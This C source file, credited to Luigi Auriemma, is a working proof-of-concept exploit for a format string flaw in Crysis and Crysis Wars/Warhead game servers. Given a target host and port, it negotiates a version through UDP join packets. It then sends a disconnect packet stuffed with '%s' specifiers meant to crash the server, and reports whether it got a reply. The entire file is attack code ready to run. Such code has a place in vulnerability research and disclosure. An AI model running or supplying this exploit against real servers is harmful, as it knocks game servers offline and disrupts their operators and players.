/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define BUFFSZ      0x1000
#define PORT        64100
#define DEFAULTVER  6729    // Crysis Wars 1.5
#define FIRSTVER    6156    // Crysis 1.21



int crysis_get_type(int type);
int crysis_set_type(int type);
int putss(u8 *data, u8 *str);
int putxx(u8 *data, u32 num, int bits);
int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



static const u8 crysis_type_table[256] =    // pre-built here
    "\x0A\x00\x00\x5C\x7A\x61\x00\x2C\x46\x80\x00\x21\x57\x00\x00\x4F"
    "\x00\x19\x1C\x00\x00\x5D\x00\x71\x12\x00\x00\x00\x51\x1E\x03\x33"
    "\x00\x13\x84\x00\x27\x00\x4E\x00\x8C\x00\x00\x00\x00\x50\x00\x2B"
    "\x3C\x82\x47\x28\x00\x11\x8D\x00\x70\x42\x0D\x01\x07\x09\x08\x05"
    "\x00\x34\x00\x6B\x10\x66\x6D\x00\x00\x39\x00\x78\x00\x00\x55\x59"
    "\x04\x00\x00\x72\x63\x00\x87\x00\x00\x00\x00\x00\x58\x67\x48\x2D"
    "\x3B\x4C\x35\x00\x26\x00\x03\x89\x00\x1A\x03\x00\x6A\x30\x83\x4A"
    "\x00\x0B\x8B\x00\x5A\x74\x00\x7D\x14\x18\x4B\x00\x00\x00\x6C\x1B"
    "\x00\x20\x00\x45\x38\x0E\x3A\x25\x86\x00\x00\x6F\x00\x5B\x00\x24"
    "\x00\x62\x00\x00\x00\x8E\x44\x00\x88\x7E\x0C\x23\x00\x36\x00\x00"
    "\x31\x00\x5F\x53\x90\x7B\x7C\x00\x41\x73\x60\x3D\x76\x00\x5E\x8A"
    "\x00\x68\x03\x3F\x00\x00\x8F\x16\x17\x00\x85\x00\x00\x00\x56\x15"
    "\x75\x00\x1D\x00\x40\x00\x00\x00\x29\x00\x4D\x22\x00\x00\x2A\x43"
    "\x7F\x3E\x2E\x00\x1F\x00\x00\x6E\x00\x00\x00\x49\x00\x00\x00\x00"
    "\x69\x00\x00\x00\x2F\x00\x32\x37\x54\x52\x00\x77\x00\x65\x00\x00"
    "\x79\x00\x00\x00\x00\x64\x0F\x81\x00\x00\x00\x00\x03\x03\x02\x06";



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd,
            i,
            len,
            type,
            ver     = DEFAULTVER;
    u16     port    = PORT;
    u8      buff[BUFFSZ],
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    srand(time(NULL));  // needed for rand()
    setbuf(stdout, NULL);

    fputs("\n"
        "Crysis <= 1.21 and Crysis Wars/Warhead <= 1.5 format string "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%hu)]\n"
            "\n", argv[0], port);
        exit(1);
    }

    if(argc > 2) port = atoi(argv[2]);
    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    for(;;) {
        p = buff;
        p += putxx(p, crysis_set_type(0x07), 8);
        p += putxx(p, ver,     32);
        p += putxx(p, 1,        32);
        p += putxx(p, 1,        32);
        p += putxx(p, 1,        32);
        p += putxx(p, 6,        32);
        p += putxx(p, 3,        32);
        p += putxx(p, 0,        32);
        for(i = 0; i < 88; i++) {
            p += sprintf(p, "%02X", rand() & 0xff);
        }

        printf("\n- send join packet\n");
        len = send_recv(sd, buff, p - buff, buff, BUFFSZ, &peer, 1);

        type = crysis_get_type(buff[0]);
        if(type != 0x08) break;
        if(ver == DEFAULTVER) {
            ver = FIRSTVER;         // test Crysis
        } else if(ver == FIRSTVER) {
            ver = DEFAULTVER + 1;   // test any other new version of Crysis Wars
        } else {
            ver++;
        }
        printf("\n- try version %d", ver);
    }

    p = buff;
    p += putxx(p, crysis_set_type(0x08), 8);
    p += putxx(p, 25,       8);
    p += putss(p, "%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s");

    printf("\n- send disconnect packet with malformed string\n");
    len = send_recv(sd, buff, p - buff, buff, BUFFSZ, &peer, 0);
    if(len < 0) {
        printf("\n- no reply from the server, it could be vulnerable\n");
    } else {
        printf("\n- check the server manually for verifying if it's vulnerable or not\n");
    }

    close(sd);
    return(0);
}



int crysis_get_type(int type) {
    type = crysis_type_table[type];
    if((type >= 0xb) && (type <= 0x4a) && ((type - 0x4b) <= 0x3f)) return(-1);
    return(type);
}



int crysis_set_type(int type) {
    int     i;

    for(i = 0; i < 256; i++) {
        if(type == crysis_type_table[i]) return(i);
    }
    return(-1);
}



int putss(u8 *data, u8 *str) {
    int     len;

    len = strlen(str);
    memcpy(data, str, len);
    return(len);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;
    for(i = 0; i < bytes; i++) {
        data[i] = num >> ((bytes - 1 - i) << 3);
    }
    return(bytes);
}



int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err) {
    int     retry,
            len;

    if(in && !out) {
        fputc('.', stdout);
        if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
          < 0) std_err();
        return(0);
    }
    if(in) {
        for(retry = 2; retry; retry--) {
            fputc('.', stdout);
            if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
              < 0) std_err();
            if(!timeout(sd, 1)) break;
        }

        if(!retry) {
            if(!err) return(-1);
            printf("\nError: socket timeout, no reply received\n\n");
            exit(1);
        }
    } else {
        if(timeout(sd, 3) < 0) return(-1);
    }

    fputc('.', stdout);
    len = recvfrom(sd, out, outsz, 0, NULL, NULL);
    if(len < 0) std_err();
    return(len);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


